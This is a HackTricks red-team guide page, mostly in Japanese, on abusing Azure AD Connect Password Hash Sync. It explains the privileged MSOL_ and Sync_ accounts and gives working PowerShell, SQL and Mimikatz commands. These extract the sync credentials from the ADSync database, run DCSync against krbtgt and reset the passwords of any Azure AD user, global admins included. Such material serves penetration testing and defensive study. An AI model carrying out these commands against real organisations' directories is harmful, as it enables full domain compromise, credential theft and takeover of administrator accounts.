Az - PHS - Password Hash Sync

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

基本情報

From the docs: パスワードハッシュの同期は、ハイブリッドアイデンティティを実現するために使用されるサインイン方法の1つです。 Azure AD Connectは、オンプレミスのActive DirectoryインスタンスからクラウドベースのAzure ADインスタンスにユーザーのパスワードのハッシュのハッシュを同期します。

これは、企業がオンプレミスのADをAzure ADと同期させるために使用する最も一般的な方法です。

すべてのユーザーとパスワードハッシュのハッシュがオンプレミスからAzure ADに同期されます。ただし、平文のパスワードや元の ハッシュはAzure ADに送信されません。さらに、組み込みのセキュリティグループ（ドメイン管理者など）はAzure ADに同期されません。

ハッシュの同期は2分ごとに行われます。ただし、デフォルトでは、パスワードの有効期限とアカウントの有効期限はAzure ADに同期されません。したがって、オンプレミスのパスワードが期限切れ（変更されていない）であるユーザーは、古いパスワードを使用してAzureリソースにアクセスし続けることができます。

オンプレミスのユーザーがAzureリソースにアクセスしようとすると、認証はAzure ADで行われます。

PHSは、アイデンティティ保護やAADドメインサービスなどの機能に必要です。

ピボット

PHSが構成されると、いくつかの特権アカウントが自動的に作成されます：

アカウント**MSOL_<installationID>は、オンプレミスADに自動的に作成されます。このアカウントにはディレクトリ同期アカウントの役割が与えられています（ドキュメントを参照）これは、オンプレミスADでレプリケーション（DCSync）権限**を持つことを意味します。
アカウント**Sync_<name of on-prem ADConnect Server>_installationIDがAzure ADに作成されます。このアカウントは、Azure AD内の任意のユーザー**（同期されたユーザーまたはクラウド専用ユーザー）のパスワードをリセットできます。

前述の2つの特権アカウントのパスワードは、Azure AD ConnectがインストールされているサーバーのSQLサーバーに保存されています。管理者は、これらの特権ユーザーのパスワードを平文で抽出できます。データベースはC:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdfにあります。

テーブルの1つから構成を抽出することが可能で、その中には暗号化されたものがあります：

SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;

暗号化された構成はDPAPIで暗号化されており、オンプレミスADの**MSOL_*ユーザーのパスワードとAzureADのSync_***のパスワードを含んでいます。したがって、これらを侵害することでADおよびAzureADへの権限昇格が可能です。

これらの資格情報がどのように保存され、復号化されるかの完全な概要はこのトークで見つけることができます。

Azure AD Connectサーバーの特定

Azure AD Connectがインストールされているサーバーがドメインに参加している場合（ドキュメントで推奨されている）、次の方法で見つけることができます：

# ActiveDirectory module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl

#Azure AD module
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

MSOL_*の悪用

# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
Get-AADIntSyncCredentials

# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'

これらの資格情報を取得するために、adconnectdumpを使用することもできます。

Sync_*の悪用

Sync_* アカウントを侵害することで、任意のユーザー（グローバル管理者を含む）のパスワードをリセットすることが可能です。

# This command, run previously, will give us alse the creds of this account
Get-AADIntSyncCredentials

# Get access token for Sync_* account
$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache

# Get global admins
Get-AADIntGlobalAdmins

# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId

# Reset the users password
Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose

# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)

クラウドユーザーのパスワードのみを変更することも可能です（予期しない場合でも）。

# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID

# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers

このユーザーのパスワードをダンプすることも可能です。

別のオプションは、サービスプリンシパルに特権のある権限を割り当てることで、Syncユーザーが権限を持っているため、そのサービスプリンシパルにアクセスすることで権限昇格を行うことです。

シームレスSSO

PHSを使用してシームレスSSOを利用することが可能で、他の悪用に対して脆弱です。詳細は以下を確認してください：

Az - Seamless SSO

参考文献

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してください。

PreviousAz - Federation NextAz - PTA - Pass-through Authentication

Last updated 1 month ago